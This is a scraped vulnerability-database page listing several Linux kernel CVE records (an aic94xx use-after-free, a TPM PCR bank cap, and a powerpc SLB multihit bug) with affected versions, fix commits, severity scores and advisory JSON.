Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < 5c04217d06a1161aaf36267e9d971ab6f847d5a7 (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < 1ef70a0b104ae8011811f60bcfaa55ff49385171 (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < de83d4617f9fe059623e97acf7e1e10d209625b5 (git) Affected: 51080de72e26771f0ed9d44982974279ccbc92b8 (git) Affected: 6.1.2 , < 6.1.160 (semver) Affected: 6.0.16 , < 6.1 (semver) |
|
| Linux | Linux |
Affected:
6.2
Unaffected: 0 , < 6.2 (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.3 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
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CVE-2025-71075 (GCVE-0-2025-71075)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-07-14 12:44
VLAI
EPSS
VEX
Title
scsi: aic94xx: fix use-after-free in device removal path
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: aic94xx: fix use-after-free in device removal path
The asd_pci_remove() function fails to synchronize with pending tasklets
before freeing the asd_ha structure, leading to a potential
use-after-free vulnerability.
When a device removal is triggered (via hot-unplug or module unload),
race condition can occur.
The fix adds tasklet_kill() before freeing the asd_ha structure,
ensuring all scheduled tasklets complete before cleanup proceeds.
Severity
No CVSS data available.
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-06-10 20:41 UTC
Assigner
References
8 references
Impacted products
5 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
2908d778ab3e244900c310974e1fc1c69066e450 , < c8f6f88cd1df35155258285c4f43268b361819df
(git)
Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < 278455a82245a572aeb218a6212a416a98e418de (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < b3e655e52b98a1d3df41c8e42035711e083099f8 (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < e354793a7ab9bb0934ea699a9d57bcd1b48fc27b (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < a41dc180b6e1229ae49ca290ae14d82101c148c3 (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < 751c19635c2bfaaf2836a533caa3663633066dcf (git) Affected: 2908d778ab3e244900c310974e1fc1c69066e450 , < f6ab594672d4cba08540919a4e6be2e202b60007 (git) |
|
| Linux | Linux |
Affected:
2.6.19
Unaffected: 0 , < 2.6.19 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.3 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
|
| Siemens | SIMATIC S7-1500 CPU 1518-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
|
| Siemens | SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
|
| Siemens | SIPLUS S7-1500 CPU 1518-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
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CVE-2025-71077 (GCVE-0-2025-71077)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-06-11 18:44
VLAI
EPSS
VEX
Title
tpm: Cap the number of PCR banks
Summary
In the Linux kernel, the following vulnerability has been resolved:
tpm: Cap the number of PCR banks
tpm2_get_pcr_allocation() does not cap any upper limit for the number of
banks. Cap the limit to eight banks so that out of bounds values coming
from external I/O cause on only limited harm.
Severity
No CVSS data available.
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-06-10 20:40 UTC
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 8ceee7288152bc121a6bf92997261838c78bfe06
(git)
Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 275c686f1e3cc056ec66c764489ec1fe1e51b950 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < ceb70d31da5671d298bad94ae6c20e4bbb800f96 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < d88481653d74d622d1d0d2c9bad845fc2cc6fd23 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < b69492161c056d36789aee42a87a33c18c8ed5e1 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 858344bc9210bea9ab2bdc7e9e331ba84c164e50 (git) Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < faf07e611dfa464b201223a7253e9dc5ee0f3c9e (git) |
|
| Linux | Linux |
Affected:
5.1
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"url": "https://git.kernel.org/stable/c/ceb70d31da5671d298bad94ae6c20e4bbb800f96"
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"url": "https://git.kernel.org/stable/c/d88481653d74d622d1d0d2c9bad845fc2cc6fd23"
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"url": "https://git.kernel.org/stable/c/b69492161c056d36789aee42a87a33c18c8ed5e1"
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"url": "https://git.kernel.org/stable/c/858344bc9210bea9ab2bdc7e9e331ba84c164e50"
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"url": "https://git.kernel.org/stable/c/faf07e611dfa464b201223a7253e9dc5ee0f3c9e"
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"cveMetadata": {
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"assignerShortName": "Linux",
"cveId": "CVE-2025-71077",
"datePublished": "2026-01-13T15:31:29.435Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-06-11T18:44:05.950Z",
"state": "PUBLISHED"
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CVE-2025-71078 (GCVE-0-2025-71078)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-08-05 12:11
VLAI
EPSS
VEX
Title
powerpc/64s/slb: Fix SLB multihit issue during SLB preload
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/64s/slb: Fix SLB multihit issue during SLB preload
On systems using the hash MMU, there is a software SLB preload cache that
mirrors the entries loaded into the hardware SLB buffer. This preload
cache is subject to periodic eviction — typically after every 256 context
switches — to remove old entry.
To optimize performance, the kernel skips switch_mmu_context() in
switch_mm_irqs_off() when the prev and next mm_struct are the same.
However, on hash MMU systems, this can lead to inconsistencies between
the hardware SLB and the software preload cache.
If an SLB entry for a process is evicted from the software cache on one
CPU, and the same process later runs on another CPU without executing
switch_mmu_context(), the hardware SLB may retain stale entries. If the
kernel then attempts to reload that entry, it can trigger an SLB
multi-hit error.
The following timeline shows how stale SLB entries are created and can
cause a multi-hit error when a process moves between CPUs without a
MMU context switch.
CPU 0 CPU 1
----- -----
Process P
exec swapper/1
load_elf_binary
begin_new_exc
activate_mm
switch_mm_irqs_off
switch_mmu_context
switch_slb
/*
* This invalidates all
* the entries in the HW
* and setup the new HW
* SLB entries as per the
* preload cache.
*/
context_switch
sched_migrate_task migrates process P to cpu-1
Process swapper/0 context switch (to process P)
(uses mm_struct of Process P) switch_mm_irqs_off()
switch_slb
load_slb++
/*
* load_slb becomes 0 here
* and we evict an entry from
* the preload cache with
* preload_age(). We still
* keep HW SLB and preload
* cache in sync, that is
* because all HW SLB entries
* anyways gets evicted in
* switch_slb during SLBIA.
* We then only add those
* entries back in HW SLB,
* which are currently
* present in preload_cache
* (after eviction).
*/
load_elf_binary continues...
setup_new_exec()
slb_setup_new_exec()
sched_switch event
sched_migrate_task migrates
process P to cpu-0
context_switch from swapper/0 to Process P
switch_mm_irqs_off()
/*
* Since both prev and next mm struct are same we don't call
* switch_mmu_context(). This will cause the HW SLB and SW preload
* cache to go out of sync in preload_new_slb_context. Because there
* was an SLB entry which was evicted from both HW and preload cache
* on cpu-1. Now later in preload_new_slb_context(), when we will try
* to add the same preload entry again, we will add this to the SW
* preload cache and then will add it to the HW SLB. Since on cpu-0
* this entry was never invalidated, hence adding this entry to the HW
* SLB will cause a SLB multi-hit error.
*/
load_elf_binary cont
---truncated---
Severity
7.8 (High)
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
5434ae74629af58ad0fc27143a9ea435f7734410 , < 01324c0328181b94cf390bda22ff91c75126ea57
(git)
Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < 2e9a95d60f1df7b57618fd5ef057aef331575bd2 (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < c9f865022a1823d814032a09906e91e4701a35fc (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < b13a3dbfa196af68eae2031f209743735ad416bf (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < 895123c309a34d2cfccf7812b41e17261a3a6f37 (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < 4ae1e46d8a290319f33f71a2710a1382ba5431e8 (git) Affected: 5434ae74629af58ad0fc27143a9ea435f7734410 , < 00312419f0863964625d6dcda8183f96849412c6 (git) |
|
| Linux | Linux |
Affected:
4.20
Unaffected: 0 , < 4.20 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.4 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
{
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"product": "Linux",
"programFiles": [
"arch/powerpc/include/asm/book3s/64/mmu-hash.h",
"arch/powerpc/kernel/process.c",
"arch/powerpc/mm/book3s64/internal.h",
"arch/powerpc/mm/book3s64/mmu_context.c",
"arch/powerpc/mm/book3s64/slb.c"
],
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"arch/powerpc/mm/book3s64/mmu_context.c",
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],
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"status": "unaffected",
"version": "6.1.160",
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},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
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{
"lessThanOrEqual": "6.12.*",
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{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19",
"versionType": "original_commit_for_fix"
}
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}
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"nodes": [
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"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction \u2014 typically after every 256 context\nswitches \u2014 to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---"
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"scenarios": [
{
"lang": "en",
"value": "AV:L - An attacker reaches the vulnerable SLB preload path through local execve() execution and induced scheduler migrations; it is not directly reachable through network traffic.\nAC:L - The attacker can repeatedly execute processes, induce context switches, and control migrations using same-owner CPU-affinity operations until the 8-bit load_slb counter wraps, without depending on victim-controlled state.\nPR:L - Ordinary unprivileged users may execute binaries and modify the affinity of their own processes; no capability, namespace privilege, or administrative access is required.\nUI:N - Exploitation is performed entirely through attacker-controlled processes and scheduling activity without requiring another user to take an action.\nS:U - The vulnerable process and affected kernel or partition remain within the same host security authority; this is not inherently a guest-to-host or other cross-scope escape.\nC:H - SLB corruption affects hardware address translation, and Power hardware can combine the VSIDs of multiple matching entries before raising the machine check. In the highest defensible case, an unintended translation can expose arbitrary mapped memory.\nI:H - The same unintended hardware translation can redirect stores and corrupt arbitrary memory or control data, potentially enabling privilege escalation or code execution.\nA:H - An SLB multihit generates a synchronous machine-check exception and warning; unsuccessful recovery, panic-on-warning configurations, or repeated triggering can crash the kernel or terminate the partition."
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-08-05T12:11:54.417Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
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"references": [
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"url": "https://git.kernel.org/stable/c/01324c0328181b94cf390bda22ff91c75126ea57"
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{
"url": "https://git.kernel.org/stable/c/2e9a95d60f1df7b57618fd5ef057aef331575bd2"
},
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"url": "https://git.kernel.org/stable/c/c9f865022a1823d814032a09906e91e4701a35fc"
},
{
"url": "https://git.kernel.org/stable/c/b13a3dbfa196af68eae2031f209743735ad416bf"
},
{
"url": "https://git.kernel.org/stable/c/895123c309a34d2cfccf7812b41e17261a3a6f37"
},
{
"url": "https://git.kernel.org/stable/c/4ae1e46d8a290319f33f71a2710a1382ba5431e8"
},
{
"url": "https://git.kernel.org/stable/c/00312419f0863964625d6dcda8183f96849412c6"
}
],
"title": "powerpc/64s/slb: Fix SLB multihit issue during SLB preload",
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"cveId": "CVE-2025-71078",
"datePublished": "2026-01-13T15:34:43.437Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-08-05T12:11:54.417Z",
"state": "PUBLISHED"
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Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
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Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
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The MITRE ATT&CK techniques below are AI-generated suggestions, inferred from the description of the
vulnerability by the CIRCL/vulnerability-attack-technique-classification-roberta-base
model, served locally by ML-Gateway.
They have not been verified by an analyst and are provided for guidance only.
The approach is described in our paper Mapping CVEs to MITRE ATT&CK Techniques: A Curated Gold-Set Classifier and the Limits of LLM-Assisted Label Expansion.
The approach is described in our paper Mapping CVEs to MITRE ATT&CK Techniques: A Curated Gold-Set Classifier and the Limits of LLM-Assisted Label Expansion.
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